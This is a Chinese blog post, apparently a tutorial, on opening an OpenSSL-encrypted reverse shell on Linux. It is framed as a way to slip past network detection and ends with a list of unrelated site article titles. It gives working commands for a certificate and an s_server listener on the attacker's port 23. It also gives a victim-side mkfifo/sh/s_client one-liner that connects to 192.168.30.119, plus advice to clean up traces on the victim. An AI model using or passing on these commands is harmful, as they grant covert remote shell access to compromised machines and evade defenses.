Reverse-Encrypted-Shell-via-Openssl
2024-09-06 23:07:24
0x01 简介
使用常规NC或者其他常规的方法反弹shell,由于流量都是明文的,很容易被网络防御设备检测到,因此需要对传输内容进行混淆或者加密。并且几乎每一个https都有openssl库,方便我们使用openssl反弹shell。下面将在linux下进行演示。
0x02 使用openssl反弹加密shell
**linux **
2.1 生成密钥
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes
自生成密钥会提示输入证书信息,如果懒人就可以一路回车。回在本目录下生成文件 key.pem cert.pem
启动监听
openssl s_server -quiet -key key.pem -cert cert.pem -port 23
此时在攻击机23端口上启动了SSL/server服务
2.2 受害主机上反弹加密shell
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.30.119:23 > /tmp/s; rm /tmp/s
tips:
1.需要注意的是,当攻击机断开连接的时候回在受害主机上提示,需要适当清除。
2.这是非交互式shell,需要提升为交互式shell,后面会补充。
最新文章
- Bill的挑战(bzoj 1879)
- 一段神奇的代码(python 2.7)网上抓图小Demo
- POJ 2352 Stars(树状数组)
- oracle 前滚和回滚
- iOS图片加载速度极限优化—FastImageCache解析
- Sublime text3中配置Github
- Ubuntu nginx: [emerg] bind() to 0.0.0.0:80 failed (13: Permission denied)
- JSON.stringify语法解析(自己留存)
- 格子布局 js
- 【初级坑跳跳跳】[NULLException] findViewById() id 引用错误,导致空指针
- 算法课上机实验(一个简单的GUI排序算法比较程序)
- ORACLE分页SQL语句(转载)
- hdu2121 最小树形图的虚根
- Flannel网络插件配置
- springmvc 对日期的转换与处理
- pytorch使用tensorboardX进行loss可视化
- ThinkPHP项目笔记之模板篇
- 06----fiter
- 关于RedHat Enterprise Linux 6.4使用Centos 6 的yum源
- 如果想从jenkins直接生成docker镜像,并推送到harbor中,最简单的脚本如何实现?